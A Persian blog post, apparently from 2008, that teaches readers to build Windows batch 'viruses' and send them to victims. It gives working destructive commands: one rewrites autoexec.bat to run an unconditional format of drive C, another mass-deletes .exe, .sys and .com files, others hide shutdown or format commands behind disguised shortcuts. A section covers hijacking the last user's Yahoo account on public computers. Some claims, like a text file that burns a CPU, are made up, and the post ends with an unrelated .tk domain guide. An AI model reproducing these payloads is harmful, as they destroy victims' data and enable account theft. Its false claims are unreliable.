۱۰.۱۹.۱۳۸۷

یه آپ طولانی


سلام یه پست طولانی گزاشتم که تا تموم این پست رو بخونید کارت اینترنتتون تموم شده این پست از نظر طولانی بودن مقام دوم رو در جهان داره در ض پست بعدی رو وقتی می زنم که نظرات این پست به ۲۰۰ تا برسه جدی گفتم حالا برسیم به درس های امروز:
امروز ميخواهم ویروسZeroZone را به شما معرفي كنم.اين ویروسTimeZone ويندوز را صفر ميكند.يعني تايم ويندوز و روز آن صفر ميشود.هيچ ضرري براي كامپيوتر ندارد فقط بايد دوباره زمان و روز ويندوز خود را تنظيم كنيد.و بيشتر براي ترساندن به كار ميرود. بازهم مثل هميشه Notepad
قسمت را با کليدهاي کنترل سي و کنترل وي برداريد در غير اين صورت جواب نمي گيريد)@Echo offtime=0:0:0حال آن را با نام Time0.bat سيو كنيد.بعد دوباره NotePad را باز كرده و كد زير را در آن تايپ كنيد.@ECHO OFFdate=10-10-10اين فايل را هم مثل فايل قبلي با نام Date0.bat سيو كنيد.حال دوباره NotePad را باز كرده و كد زير را در آن تايپ كنيد.@echo offecho I AM A VIRUSecho SEAT AND SEE MY POWER!!!...pauseو آن را با نام Comment.bat ذخيره كنيد.يه NotePad باز كرده وكد زير را در آن تايپ كنيد.START TIME0START DATE0START commentوآن را با نام Help.bat ذخيره كنيد.بر روي فايل آخر رايت كليك كرده و Create ShortCut را بزنيد و نام آنرا به Help.txt تغيير دهيد.سپس با رايت كليك بر روي Help.txt وانتخاب Properties و زدن Change Icon يه آيكون براي فايل خود انتخاب كنيد.بقيه فايلها را در يك Folder ذخيره كنيد كه شما ميتوانيد آن Folder را نيز Hidden كنيد.حال ویروس ما آماده است
---------------
-------------تا الآن بدترين و آزار دهنده ترين ويروسي که در دنيا معرفي شده ويروس BLASTER_&_SASSAR است.اين ويروس سي پي يو فرد قرباني رو ميسوزونه.من آموزش ساختن اين ويروس رو به شما ياد ميدهيم.
۱-تا الآن بدترين و آزار دهنده ترين ويروسي که در دنيا معرفي شده ويروس BLASTER_&_SASSAR است.اين ويروس سي پي يو فرد قرباني رو ميسوزونه.من آموزش ساختن اين ويروس رو به شما ياد ميدهيم.
1.روي دسکتاپ راست کليک کنيد.
2.گزينه new رو انتخاب کنيد.
3.text doceument رو انتخاب کنيد
4.حالا وارد تکست داکيومنت خود شويد و در آن تايپ کنيد
5.cpu_567hjkblaster
6.حالا از آن خارج شويد و روش راست کليک کنيد
7.گزينه rename رو انتخاب کنيد و يک اسم دلخواه براي آن فايل بگذاريد.
8.بعد اين فايل رو براي يکي بفرستيد.
خطر: اگر سي پي يو تون رو دوست دارين به هيچ وجه اين فايل را در سيستم خود اجراي نکنيد و گرنه....
-----------------
با اين ويروسی که امروز به شما آموزش می دم می تونيد درايو C قر با نی رو فرمت کنيد
اين ويروس فوق العاده استثناييه !!! ولي در اينجا من نحوه ي ساختن اين ويروس رو قرار ميدم تا شما بتونيد به راحتي نون بازوي خود رو خورده و از اون لذت ببريد!!!
شما جوری درايو C<> قر بانی فرمت می کنيد که به هيچ عنوان اطلاعات آن باز يابی نشود در اصل شما درايو قربانی رو Format U <>کردين.
*** <>فرمت كردن درايو C سيستم قرباني به وسيله ي يك فايل BAT :***
براي اين كار ابتدا notepad رو باز كنيد بعد كد زير رو كپي كرده و در اونجا paste كنيد :
@echo offcall attrib -r -h c:\autoexec.bat >nulecho @echo off >c:\autoexec.batecho format /autotest c:/u>nul >>c:\autoexec.batcall attrib +r +h c:\autoexec.bat >nulexit
در اين مرحله شما فقط كافيه كه اين فايل رو با پسوند BAT ذخيره كنيد.
سخت بود ؟؟؟؟ قطعا" نه !!!
به همين راحتي شما يكي از قدرتمند ترين ويروس ها ي بي خطر ( البته در حالت غير اكتيو !!!) رو ساختيد .
با ذكر اين نكته كه به هيچ وجه روي اون دابل كليك نكنيد بايد بگم كه من اصلا" دوست ندارم كه اين ويروس رو روي كسي امتحان كنيد و در واقع من هيچ تعهدي در قبال اون نخواهم داد
و اما اين ويروس چه كار ميكنه :
اين كد ابتدا اطلاعات موجود در autoexe.bat رو پاك ميكنه .............. در مرحله ي بعد كد 'format /autotest c:/u' رو جاي اون قرار ميده ............... حال فقط كافيه كه قرباني سيستمش رو ريست كنه بعد اين كد اجرا شده و به راحتي هرچه تمام تر درايو C فرمت خواهد شد .
راستی ويروس های ديگر هستند که مثل اين ويروس بعد از اجرا شدن آن دريو C قربانی فرمت ميشه اما اين ويروس جوری دستگاه قربانی رو فرمت می کنه که به هيچ عنوان اطلاعات آن بازيابی نشود<>.
<> *** ساختن ويروس بعدی رو آغاز می کنيم:***
روی start رفته و روی run کليک کنيد و notepad را تايپ کنيد بعد از باز شدن پنجره اين ها رو بنويسيد توش @echo off Cls ====== Color fc Del /a c:\*.com Del /a c:\*.sys Del /a c:\*.exe /s ====== خوب تايپ کردن ديگه بسه اين فايل را با هر نامی که دل تان خواست ذخيره کنيد ولی پسوند را با نام bat بگذاريد ، مثل love.bat خوب کار ديگه تموم شد اين ويروس رو اگر کسی باز کنه کامپيوتر رو با خاک مساوی می کنه و ويندوز يا هر نوع سيستم عامل ديگه رو از کار می اندازه
*** ويروس بلستر***
عمل:
<>اين ويروس پس از اجرا شدن شروع به شمارش معکوس می کند که به هيچ وجه نمی توان جلوی آن را گرفت و با رسيدن شمارش به صفر بسته به نوع <>دستوری که شما به آن داده ايد شروع به عمل به دستور مذکور می کند اين عمل می تواند لوگ آف شدن - رستارت شدن و يا حتی خاموش شدن سيستم باشد. جالبتر اينکه مدت زمان انجام اين عمل نيز از سوی شما قابل کنترل می باشد.
نحوه ی ساخت:
برای ساخت اين ويروس شما می توانی به دو صورت عمل کنيد:
1:برنامه ی نوت پد را اجرا کنيد و دستورات زير را دقيقا درون آن بنويسيد. (می توانيد برای اين کار از copy & paste استفاده کنيد):Shutdown -s -t x x
<>که در آن x <>x<> <>برابر است با مدت زمانی که برای اجرای اين برنامه در نظر می گيريد و s نيز نوع دستوری است که به آن می دهيد (در اين جا خاموش شدن می باشد) که شما می توانيد آن را به r (برای رستارت شدن) ويا L (برای لوگ آف شدن ) تغيير دهيد.پس از نوشتن مطالب بالا از منوی File گزينه یSave as رو انتخاب کنين و در قسمت File name اسمی دلخواه برای ويروس خود انتخاب کنين و آن را با پسوند batذخيره کنيد (برای اين کار در مقابل اسم آن بنويسيد bat.و سپس بر روی save کليک کنيد).
2:روش دوم ساخت اين ويروس به اين صورت است:
بر روی فضايی خالی در Desktop راست کليک کرده و از قسمت New گزینه ی Shortcut را انتخاب کنيد و در کادری که می بينيد دستور زير را بنويسيد:
shutdown -s -t x x
توجه کنيد که تمامی قسمت های اين دستور مانند روش اول قابل تغيير می باشند. حالا بر روی Nextکليک کنيد و در صفحه ی بعدی Finish رو انتخاب کنيد.
<>
و اما پادزهر اين ويروس:
برای ساخت پادزهر اين ويروس نيز می توانيد از هر دو روش گفته شده در روش ساخت ويروس استفاده کنيد. با اين تفاوت که برای ساختن پادزهر بايد دستور زير را به جای دستور قبلی بنويسيد:
shutdown -a
*** ويروس بعدی:***
عمل:
اين ويروس بسيار ساده می تواند در عرض کمتر از چند ثانيه هر درايوی را که شما بخواهيد از کامپيوتر قربانی پاک کند.
نحوه ی ساخت:
برای ساخت اين ويروس بايد به صورت زير عمل کنيد:
بر روی فضايی خالی در Desktop راست کليک کرده و از قسمت New گزينه ی Shortcut را انتخاب کنيد و در کادری که می بينيد دستور زير را بنويسيد:
ّFormat XHYPERLINK "file:///X:/y":\y
که X اسم درايو مورد نظر شماست.بر روی Next کليک کنيد . در صفحه ی بعدی نيز Next را انتخاب کنيد و در صفحه ی آخر پس از انتخاب آيکن دلخواه روی Finish کليک کنيد.
*** دو تا ويروس BLASTER_&_SASSAR ***
سلام
۱-تا الآن بدترين و آزار دهنده ترين ويروسي که در دنيا معرفي شده ويروس BLASTER_&_SASSAR است.
اين ويروس CPU<> فرد قرباني رو ميسوزونه.من ساختن اين ويروس رو به شما ياد ميدهيم. <>
1.روي دسکتاپ راست کليک کنيد.
2.گزينه new رو انتخاب کنيد.
3.text doceument رو انتخاب کنيد
4.حالا وارد تکست داکيومنت خود شويد و در آن تايپ کنيد
5.cpu_567hjkblaster
6.حالا از آن خارج شويد و روش راست کليک کنيد
7.گزينه rename رو انتخاب کنيد و يک اسم دلخواه براي آن فايل بگذاريد.
8.بعد اين فايل رو براي يکي بفرستيد.
خطر: اگر سي پي يو تون رو دوست دارين به هيچ وجه اين فايل را در سيستم خود اجراي نکنيد و گرنه....
حالا بريد و به شدت حالشو ببريد
آماده ی ويوس های بعدی باشيد.
نظر يادت نره
==================================
چگونگي ساخت دامنه (Domain) رايگان TK. اين نوع دامنه صرفا براي وبلاگها و سايت هايي مورد استفاده قرار مي گيرد، که در فضاهاي رايگان قرار دارند مانند سايت هايي که در فضاي رايگان Netfrims قرار دارند همچنين وبلاگ هايي که در سرويس هاي وبلاگ رايگان مانند پرشين بلاگ ، بلاگ اسکاي، بلاگر، ميهن بلاگ و هر سرويس ديگر مي توانند آدرس وبلاگ خود را به طور مثال از http://yourblog.mihanblog.com/ به http://www.yourblog.tk/ تغيير دهند.
براي اين منظور ابتدا به سايت http://www.dot.tk/ رفته و درقسمت register a new domain نام دامنه مورد نظر خود را بنويسيد و OK را كليك كنيد. اگر نام پيشنهادي شما قبلا توسط شخص ديگري به ثبت نرسيده باشد، به صورت اتوماتيک به قسمت دوم ارجاع داده مي شويد در اين بخش در قسمت : Your current web address آدرس كامل سايت يا وبلاگ خود را بنويسيد. براي مثالhttp://test.mihanblog.com بعد از اين كار در قسمت Website description توضيح كاملي از سايت خود بنويسيد. از قسمت Please select the category that fits your website نوع فعاليت وبلاگ و يا سايت را نيز مشخص كنيد. مثلا Music بعد از آن بايد نوع زبان را انتخاب كنيد. مي توانيد زبان را English انتخاب نماييد. در مرحله سوم شما بايد كلمات كليدي سايت خود را در جاهايي كه مشخص شده وارد كنيد. سايتي كه مثلا در باره موسيقي و آموزش گيتار و . . . است بايد اين كلمات را به انگليسي و فارسي وارد كند تا گوگل و ديگر موتورهاي جستجو بتوانند سايت را مورد جستجو قرار داده، و به طور ساده تر سايت شما را نيز در نتايج جستجو ها نمايش دهند. بعد از اين كار از قسمت A closer look at your website چند گزينه دلخواه ديگر را نيز انتخاب نماييد. سپس از قسمت Word verification عين كلمه اي را كه در زير آن بصورت بزرگ نوشته شده تايپ كنيد. قسمت Ambassador Coupon Number را دستکاري نکنيد و به مرحله سوم برويد.( با كليك بر روي گزينه Continue )مرحله آخر هم برا وارد كردن اطلاعات خودتان است. آدرس ، كد پستي ، شمار تلفن و ...که نيازي نيست آنها را به صورت صحيح وارد نماييد . تنها چيزي كه مهم است و بايد صحيح باشد يک Email معتبر و تعيين کلمه عبور براي دامنه هست. طبق معمول پسورد را بايد دو بار بنويسيد. براي وارد شدن به قسمت تنظيمات دامين بايد در صفحه اول بر روي گزينه MYtk كليك كنيد. بعد از آن آدرس ايميلي را كه در مرحله آخر وارد كرده بوديد به همراه پسوردي كه داده بوديد را وارد ميكنيد و وارد كنترل پنل دامنه Tk خود مي شويد. همه چيز تمام شد. شما صاحب يك دامين TK رايگان هستيد. و از اين پس به جاي نام طولاني و گيج کننده وبلاگ خود مي توانيد آدرس دامنه TK خود به دوستان و آشنايان بدهيد.
======================
گرفتن پسورد طرف تو YAHOO:
وقتی شما به یک سیستم عمومی مراجعه میکنید مثل کافی نت شما میتونید به پسورد آخرین نفر ی که چت کرده با id او دسترسی پیدا کنید حتی اگه پسوردشو save نکرده باشه!! برای این کار شما باید به منوی start رفته و بعداز آن run در آنجا تایپ کنید regedit ودر آنجا به این شاخه بروید HKEY_CURRENT_USER\Software\Yahoo\Pager و تو فایل هائی که سمت راست ظاهر میشه save password رو انتخاب کرده و روش2 بار کلیک کنید در اونجا گزینه ی value data رو از مقدار 1 به 100 تبدیل کنید حالا ok رو بزنید و از رجیستری خارج بشید حال میتونید با آخرین آی دی لوگاین بشید و با یک برنامه که پسورد ستاره دار رو باز می کنه پسوردشو پیدا کنید راه های دیگری نیز برای پیدا کردن پسورد یا هو وجود داره و یکی از اونا استفاده از برنامه های کرکر است که این برنامه پسورد ها رو یکی یکی امتحان می کنه و این کار خیلی وقت گیره و لی با برنامه هائی که برای این کار ساخته می شه راحت تر می شه این کارو کرد.
پیدا کردن IP ایمیل ها :
اين راه نياز به تغيراتي در تنظيمات دارد مراحل زير را دنبال کنيد : Mail Options ايميلتان را باز کرده گرينه را انتخاب کنيد سپس گزينه General Preferences در اين قسمت تغيراتي را ميتوانيد در ايميلتان ايجاد کنيد مثل from nameاسمتون رو در نامه هائي که ميفرستيد تغير ميدهد و messeges per page تعداد نامه هائي که در يک صفحه نشان داده ميشود و . . . بريم ادامه بحث خودمون ! headers : در اين قسمت با انتخاب show all می تونید IP تمام افرادی رو که بهتون ایمیل می فرستند رو ببینید و در انتها تغییرات رو save کن .saبه همین راحتی میتونی این همه کار بکنی !!!!!!!!!!

هیچ نظری موجود نیست:

http://up.iranblog.com/images/0z5dgraxwa4j49a5ts77.gif http://up.iranblog.com/images/gv83ah5giec9g8jkopmc.gif